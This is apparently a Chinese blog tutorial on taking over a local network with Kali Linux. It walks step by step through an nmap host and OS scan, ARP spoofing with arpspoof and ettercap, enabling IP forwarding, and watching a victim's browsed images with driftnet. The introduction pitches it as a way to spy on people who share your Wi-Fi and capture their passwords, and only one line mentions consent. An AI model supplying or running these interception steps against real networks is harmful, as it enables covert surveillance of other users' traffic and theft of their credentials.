Kali Linux進行ARP欺騙

制霸內網之——Kali Linux進行ARP欺騙

參考資料:http://www.freebuf.com/articles/system/5157.html
如果你附近有一位學計算機專業的同學,你樂呵呵地蹭他的網,要當心啦。你所有瀏覽的信息都可能被看到。有些網站的密碼也可能被不良同學獲取到(奸笑)。好吧,想要制霸內網,其實很簡單。

摘要:本文介紹對局域網內用戶進行arp欺騙的簡單方法。文中通過arp欺騙,監聽獲取到局域網中其他電腦網絡上瀏覽的圖片。

實驗是在攻擊主機主人許可情況下進行的,請各位同學一定要遵守法律,做一名有理想、有道德、有文化、有紀律的好青(zhong)年。

以下命令均在終端中運行。

所用工具:

  • Kali Linux
  • nmap
  • arpspoof
  • Ettercap
  • driftnet

安裝Kali Linux

Kali Linux裏已經集成了很多滲透軟件。這些用到的工具不用準備,只要安裝好Kali Linux就好。網上安裝教程很多,我就不介紹啦。

尋找目標主機

ifconfig

查看自己ip地址、子網掩碼等信息。

這裏寫圖片描述

上圖中,可以看到,本機的ip地址是:172.17.171.23 子網掩碼是:255.255.255.0

接下來掃描內網中的主機:

nmap -sP 172.17.171.0/24

這裏寫圖片描述

根據ip地址和子網掩碼,使用nmap進行掃描。根據掃描結果,來確定目標主機。本篇目標主機ip是:172.17.171.21 。

我們還可以使用以下命令來查看目標主機的操作系統信息:

nmap -O 172.17.171.21

關於nmap介紹資料:http://jingyan.baidu.com/article/47a29f24312010c0142399f1.html

進行arp欺騙,獲取流量

先進行個小實驗:

arpspoof -i eth1 -t 172.17.171.21 172.17.171.1

這裏寫圖片描述

使用這個命令獲取到從 172.17.171.21 發往 172.17.171.1(路由器)的流量。
流量被攔截,可以試一試,目標主機這時打不開想瀏覽的網頁。

我們想要做的是查看目標主機在線瀏覽的圖片,並且讓目標主機察覺不到。下面進行:

開啓流量轉發功能
使流量經過流程爲:

Created with Raphaël 2.1.0ABC

A是路由器,B是攻擊主機,C是目標主機。

1.首先開啓流量轉發功能:

echo 1 >> /proc/sys/net/ipv4/ip_forward

2.使用arpspoof/ettercap,選一個進行arp欺騙。獲取從172.17.171.1(路由器) 到 172.17.171.21(目標機)的流量。

arpspoof -i eth0 -t 172.17.171.1  172.17.171.21
ettercap -T -q -M ARP /172.17.171.21// /

這裏寫圖片描述

3.打開另一個終端,使用driftnet進行流量監控,顯示圖片

driftnet -i eth1

這裏寫圖片描述

小結

操作過程中發現,只能顯示部分圖片,很多圖片還是顯示不出來。
另外,獲取了所有的流量,除了看圖片還可以瀏覽所有的流量信息。使用wireshark或者其他的嗅探工具進行分析吧,have fun。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章